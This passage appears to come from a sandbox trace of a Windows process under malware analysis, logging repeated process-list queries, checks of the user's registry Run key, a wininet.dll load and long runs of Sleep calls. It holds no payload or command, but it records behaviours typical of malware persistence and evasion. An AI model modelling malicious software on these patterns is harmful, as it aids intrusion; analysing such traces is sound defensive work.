RegionSize=0xdea68*=0x10000) returned 0x0 [0312.516] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0312.520] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0312.520] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0312.521] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0312.527] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0312.528] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0312.544] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0312.545] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0312.545] NtClose (Handle=0x378) returned 0x0 [0312.546] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0312.546] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0312.549] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0312.549] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0312.549] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0312.556] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0312.557] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0312.561] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0312.563] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0312.563] NtClose (Handle=0x378) returned 0x0 [0312.563] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0312.563] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0312.566] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0312.567] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0312.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0312.578] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0312.579] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0313.141] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0313.143] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0313.144] NtClose (Handle=0x378) returned 0x0 [0313.144] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0313.144] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0313.147] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0313.147] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0313.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0313.153] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0313.154] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0313.160] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0313.161] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0313.161] NtClose (Handle=0x378) returned 0x0 [0313.162] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0313.162] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0313.165] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0313.173] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0313.174] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0313.179] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0313.180] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0313.182] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0313.183] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0313.183] NtClose (Handle=0x378) returned 0x0 [0313.183] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0313.183] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0313.187] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0313.187] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0313.187] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0313.193] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0313.194] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0313.199] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0313.201] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0313.201] NtClose (Handle=0x378) returned 0x0 [0313.201] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0313.201] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0313.204] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0313.204] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0313.205] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0313.210] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0313.211] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0313.268] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0313.269] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0313.269] NtClose (Handle=0x378) returned 0x0 [0313.269] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0313.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0313.366] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0313.366] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0313.366] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0313.372] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0313.374] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) Thread: id = 81 os_tid = 0xfe4 Thread: id = 87 os_tid = 0xc38 [0187.576] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x60eff58*=0x0, ZeroBits=0x0, RegionSize=0x60eff5c*=0x2cc48, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x60eff58*=0x8360000, RegionSize=0x60eff5c*=0x2d000) returned 0x0 [0187.583] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="wininet.dll", BaseAddress=0x60eff44 | out: BaseAddress=0x60eff44*=0x716e0000) returned 0x0 [0188.163] Sleep (dwMilliseconds=0x7d0) [0190.186] Sleep (dwMilliseconds=0x7d0) [0192.295] Sleep (dwMilliseconds=0x7d0) [0194.317] Sleep (dwMilliseconds=0x7d0) [0196.345] Sleep (dwMilliseconds=0x7d0) [0198.352] Sleep (dwMilliseconds=0x7d0) [0200.374] Sleep (dwMilliseconds=0x7d0) [0202.382] Sleep (dwMilliseconds=0x7d0) [0204.383] Sleep (dwMilliseconds=0x7d0) [0206.384] Sleep (dwMilliseconds=0x7d0) [0208.387] Sleep (dwMilliseconds=0x7d0) [0208.388] Sleep (dwMilliseconds=0x7d0) [0208.390] Sleep (dwMilliseconds=0x7d0) [0208.391] Sleep (dwMilliseconds=0x7d0) [0208.394] Sleep (dwMilliseconds=0x7d0) [0208.407] Sleep (dwMilliseconds=0x7d0) [0208.430] Sleep (dwMilliseconds=0x7d0) [0208.437] Sleep (dwMilliseconds=0x7d0) [0208.439] Sleep (dwMilliseconds=0x7d0) [0208.440] Sleep (dwMilliseconds=0x7d0) [0208.442] Sleep (dwMilliseconds=0x7d0) [0208.444] Sleep (dwMilliseconds=0x7d0) [0208.445] Sleep (dwMilliseconds=0x7d0) [0208.447] Sleep (dwMilliseconds=0x7d0) [0208.448] Sleep (dwMilliseconds=0x7d0) [0208.450] Sleep (dwMilliseconds=0x7d0) [0208.451] Sleep (dwMilliseconds=0x7d0) [0208.453] Sleep (dwMilliseconds=0x7d0) [0208.454] Sleep (dwMilliseconds=0x7d0) [0208.456] Sleep (dwMilliseconds=0x7d0) [0208.457] Sleep (dwMilliseconds=0x7d0) [0208.459] Sleep (dwMilliseconds=0x7d0) [0208.460] Sleep (dwMilliseconds=0x7d0) [0208.462] Sleep (dwMilliseconds=0x7d0) [0208.463] Sleep (dwMilliseconds=0x7d0) [0208.466] Sleep (dwMilliseconds=0x7d0) [0208.467] Sleep (dwMilliseconds=0x7d0) [0208.469] Sleep (dwMilliseconds=0x7d0) [0208.470] Sleep (dwMilliseconds=0x7d0) [0208.472] Sleep (dwMilliseconds=0x7d0) [0208.473] Sleep (dwMilliseconds=0x7d0) [0208.475] Sleep (dwMilliseconds=0x7d0) [0208.476] Sleep (dwMilliseconds=0x7d0) [0208.478] Sleep (dwMilliseconds=0x7d0) [0208.480] Sleep (dwMilliseconds=0x7d0) [0208.481] Sleep (dwMilliseconds=0x7d0) [0208.483] Sleep (dwMilliseconds=0x7d0) [0208.484] Sleep (dwMilliseconds=0x7d0) [0208.486] Sleep (dwMilliseconds=0x7d0) [0208.487] Sleep (dwMilliseconds=0x7d0) [0208.489] Sleep (dwMilliseconds=0x7d0) [0208.490] Sleep (dwMilliseconds=0x7d0) [0208.492] Sleep (dwMilliseconds=0x7d0) [0208.493] Sleep (dwMilliseconds=0x7d0) [0208.495] Sleep (dwMilliseconds=0x7d0) [0208.496] Sleep (dwMilliseconds=0x7d0) [0208.498] Sleep (dwMilliseconds=0x7d0) [0208.499] Sleep (dwMilliseconds=0x7d0) [0208.501] Sleep (dwMilliseconds=0x7d0) [0208.502] Sleep (dwMilliseconds=0x7d0) [0208.504] Sleep (dwMilliseconds=0x7d0) [0208.505] Sleep (dwMilliseconds=0x7d0) [0208.511] Sleep (dwMilliseconds=0x7d0) [0208.513] Sleep (dwMilliseconds=0x7d0) [0208.515] Sleep (dwMilliseconds=0x7d0) [0208.517] Sleep (dwMilliseconds=0x7d0) [0208.519] Sleep (dwMilliseconds=0x7d0) [0208.521] Sleep (dwMilliseconds=0x7d0) [0208.522] Sleep (dwMilliseconds=0x7d0) [0208.524] Sleep (dwMilliseconds=0x7d0) [0208.525] Sleep (dwMilliseconds=0x7d0) [0208.527] Sleep (dwMilliseconds=0x7d0) [0208.528] Sleep (dwMilliseconds=0x7d0) [0208.530] Sleep (dwMilliseconds=0x7d0) [0208.535] Sleep (dwMilliseconds=0x7d0) [0208.537] Sleep (dwMilliseconds=0x7d0) [0208.538] Sleep (dwMilliseconds=0x7d0) [0208.540] Sleep (dwMilliseconds=0x7d0) [0208.541] Sleep (dwMilliseconds=0x7d0) [0208.543] Sleep (dwMilliseconds=0x7d0) [0208.544] Sleep (dwMilliseconds=0x7d0) [0208.546] Sleep (dwMilliseconds=0x7d0) [0208.547] Sleep (dwMilliseconds=0x7d0) [0208.549] Sleep (dwMilliseconds=0x7d0) [0208.550] Sleep (dwMilliseconds=0x7d0) [0208.552] Sleep (dwMilliseconds=0x7d0) [0208.553] Sleep (dwMilliseconds=0x7d0) [0208.555] Sleep (dwMilliseconds=0x7d0) [0208.556] Sleep (dwMilliseconds=0x7d0) [0208.558] Sleep (dwMilliseconds=0x7d0) [0208.559] Sleep (dwMilliseconds=0x7d0) [0208.561] Sleep (dwMilliseconds=0x7d0) [0208.562] Sleep (dwMilliseconds=0x7d0) [0208.564] Sleep (dwMilliseconds=0x7d0) [0208.566] Sleep (dwMilliseconds=0x7d0) [0208.568] Sleep (dwMilliseconds=0x7d0) [0208.569] Sleep (dwMilliseconds=0x7d0) [0208.581] Sleep (dwMilliseconds=0x7d0) [0208.584] Sleep (dwMilliseconds=0x7d0) [0208.586] Sleep (dwMilliseconds=0x7d0) [0208.587] Sleep (dwMilliseconds=0x7d0) [0208.588] Sleep (dwMilliseconds=0x7d0) [0208.590] Sleep (dwMilliseconds=0x7d0) [0208.592] Sleep (dwMilliseconds=0x7d0) [0208.602] Sleep (dwMilliseconds=0x7d0) [0208.615] Sleep (dwMilliseconds=0x7d0) [0208.622] Sleep (dwMilliseconds=0x7d0) [0208.630] Sleep (dwMilliseconds=0x7d0) [0208.631] Sleep (dwMilliseconds=0x7d0) [0208.633] Sleep (dwMilliseconds=0x7d0) [0208.637] Sleep (dwMilliseconds=0x7d0) [0208.638] Sleep (dwMilliseconds=0x7d0) [0208.644] Sleep (dwMilliseconds=0x7d0) [0208.645] Sleep (dwMilliseconds=0x7d0) [0208.654] Sleep (dwMilliseconds=0x7d0) [0208.655] Sleep (dwMilliseconds=0x7d0) [0208.663] Sleep (dwMilliseconds=0x7d0) [0208.670] Sleep (dwMilliseconds=0x7d0) [0208.672] Sleep (dwMilliseconds=0x7d0) [0208.677] Sleep (dwMilliseconds=0x7d0) [0208.683] Sleep (dwMilliseconds=0x7d0) [0208.689] Sleep (dwMilliseconds=0x7d0) [0208.690] Sleep (dwMilliseconds=0x7d0) [0208.695] Sleep (dwMilliseconds=0x7d0) [0208.697] Sleep (dwMilliseconds=0x7d0) [0208.702] Sleep (dwMilliseconds=0x7d0) [0208.709] Sleep (dwMilliseconds=0x7d0) [0208.715] Sleep (dwMilliseconds=0x7d0) [0208.717] Sleep (dwMilliseconds=0x7d0) [0208.721] Sleep (dwMilliseconds=0x7d0) [0208.723] Sleep (dwMilliseconds=0x7d0) [0208.729] Sleep (dwMilliseconds=0x7d0) [0208.730] Sleep (dwMilliseconds=0x7d0) [0208.736] Sleep (dwMilliseconds=0x7d0) [0208.742] Sleep (dwMilliseconds=0x7d0) [0208.743] Sleep (dwMilliseconds=0x7d0) [0208.748] Sleep (dwMilliseconds=0x7d0) [0208.750] Sleep (dwMilliseconds=0x7d0) [0208.755] Sleep (dwMilliseconds=0x7d0) [0208.756] Sleep (dwMilliseconds=0x7d0) [0208.762] Sleep (dwMilliseconds=0x7d0) [0208.763] Sleep (dwMilliseconds=0x7d0) [0208.767] Sleep (dwMilliseconds=0x7d0) [0208.769] Sleep (dwMilliseconds=0x7d0) [0208.776] Sleep (dwMilliseconds=0x7d0) [0208.778] Sleep (dwMilliseconds=0x7d0) [0208.783] Sleep (dwMilliseconds=0x7d0) [0208.784] Sleep (dwMilliseconds=0x7d0) [0208.790] Sleep (dwMilliseconds=0x7d0) [0208.791] Sleep (dwMilliseconds=0x7d0) [0208.797] Sleep (dwMilliseconds=0x7d0) [0208.799] Sleep (dwMilliseconds=0x7d0) [0208.805] Sleep (dwMilliseconds=0x7d0) [0208.810] Sleep (dwMilliseconds=0x7d0) [0208.813] Sleep (dwMilliseconds=0x7d0) [0208.816] Sleep (dwMilliseconds=0x7d0) [0208.818] Sleep (dwMilliseconds=0x7d0) [0208.823] Sleep (dwMilliseconds=0x7d0) [0208.824] Sleep (dwMilliseconds=0x7d0) [0208.830] Sleep (dwMilliseconds=0x7d0) [0208.831] Sleep (dwMilliseconds=0x7d0) [0208.836] Sleep (dwMilliseconds=0x7d0) [0208.842] Sleep (dwMilliseconds=0x7d0) [0208.844] Sleep (dwMilliseconds=0x7d0) [0208.849] Sleep (dwMilliseconds=0x7d0) [0208.856] Sleep (dwMilliseconds=0x7d0) [0208.858] Sleep (dwMilliseconds=0x7d0) [0208.863] Sleep (dwMilliseconds=0x7d0) [0208.864] Sleep (dwMilliseconds=0x7d0) [0208.870] Sleep (dwMilliseconds=0x7d0) [0208.872] Sleep (dwMilliseconds=0x7d0) [0208.879] Sleep (dwMilliseconds=0x7d0) [0208.887] Sleep (dwMilliseconds=0x7d0) [0208.889] Sleep (dwMilliseconds=0x7d0) [0208.894] Sleep (dwMilliseconds=0x7d0) [0208.896] Sleep (dwMilliseconds=0x7d0) [0208.902] Sleep (dwMilliseconds=0x7d0) [0208.903] Sleep (dwMilliseconds=0x7d0) [0208.907] Sleep (dwMilliseconds=0x7d0) [0208.910] Sleep (dwMilliseconds=0x7d0) [0208.916] Sleep (dwMilliseconds=0x7d0) [0208.918] Sleep (dwMilliseconds=0x7d0) [0208.923] Sleep (dwMilliseconds=0x7d0) [0208.925] Sleep (dwMilliseconds=0x7d0) [0208.931] Sleep (dwMilliseconds=0x7d0) [0208.933] Sleep (dwMilliseconds=0x7d0) [0208.938] Sleep (dwMilliseconds=0x7d0) [0208.944] Sleep (dwMilliseconds=0x7d0) [0208.946] Sleep (dwMilliseconds=0x7d0) [0208.952] Sleep (dwMilliseconds=0x7d0) [0208.955] Sleep (dwMilliseconds=0x7d0) [0208.959] Sleep (dwMilliseconds=0x7d0) [0208.961] Sleep (dwMilliseconds=0x7d0) [0208.966] Sleep (dwMilliseconds=0x7d0) [0208.968] Sleep (dwMilliseconds=0x7d0) [0208.974] Sleep (dwMilliseconds=0x7d0) [0208.982] Sleep (dwMilliseconds=0x7d0) [0208.983] Sleep (dwMilliseconds=0x7d0) [0208.989] Sleep (dwMilliseconds=0x7d0) [0208.991] Sleep (dwMilliseconds=0x7d0) [0209.041] Sleep (dwMilliseconds=0x7d0) [0209.043] Sleep (dwMilliseconds=0x7d0) [0209.045] Sleep (dwMilliseconds=0x7d0) [0209.049] Sleep (dwMilliseconds=0x7d0) [0209.056] Sleep (dwMilliseconds=0x7d0) [0209.063] Sleep (dwMilliseconds=0x7d0) [0209.069] Sleep (dwMilliseconds=0x7d0) [0209.071] Sleep (dwMilliseconds=0x7d0) [0209.078] Sleep (dwMilliseconds=0x7d0) [0209.084] Sleep (dwMilliseconds=0x7d0) [0209.085] Sleep (dwMilliseconds=0x7d0) [0209.089] Sleep (dwMilliseconds=0x7d0) [0209.091] Sleep (dwMilliseconds=0x7d0) [0209.093] Sleep (dwMilliseconds=0x7d0) [0209.099] Sleep (dwMilliseconds=0x7d0) [0209.106] Sleep (dwMilliseconds=0x7d0) [0209.107] Sleep (dwMilliseconds=0x7d0) [0209.115] Sleep (dwMilliseconds=0x7d0) [0209.117] Sleep (dwMilliseconds=0x7d0) [0209.133] Sleep (dwMilliseconds=0x7d0) [0209.134] Sleep (dwMilliseconds=0x7d0) [0209.140] Sleep (dwMilliseconds=0x7d0) [0209.142] Sleep (dwMilliseconds=0x7d0) [0209.148] Sleep (dwMilliseconds=0x7d0) [0209.149] Sleep (dwMilliseconds=0x7d0) [0209.155] Sleep (dwMilliseconds=0x7d0) [0209.156] Sleep (dwMilliseconds=0x7d0) [0209.162] Sleep (dwMilliseconds=0x7d0) [0209.163] Sleep (dwMilliseconds=0x7d0) [0209.169] Sleep (dwMilliseconds=0x7d0) [0209.176] Sleep (dwMilliseconds=0x7d0) [0209.178] Sleep (dwMilliseconds=0x7d0) [0209.183] Sleep (dwMilliseconds=0x7d0) [0209.185] Sleep (dwMilliseconds=0x7d0) [0209.186] Sleep (dwMilliseconds=0x7d0) [0209.191] Sleep (dwMilliseconds=0x7d0) [0209.198] Sleep (dwMilliseconds=0x7d0) [0209.205] Sleep (dwMilliseconds=0x7d0) [0209.206] Sleep (dwMilliseconds=0x7d0) [0209.212] Sleep 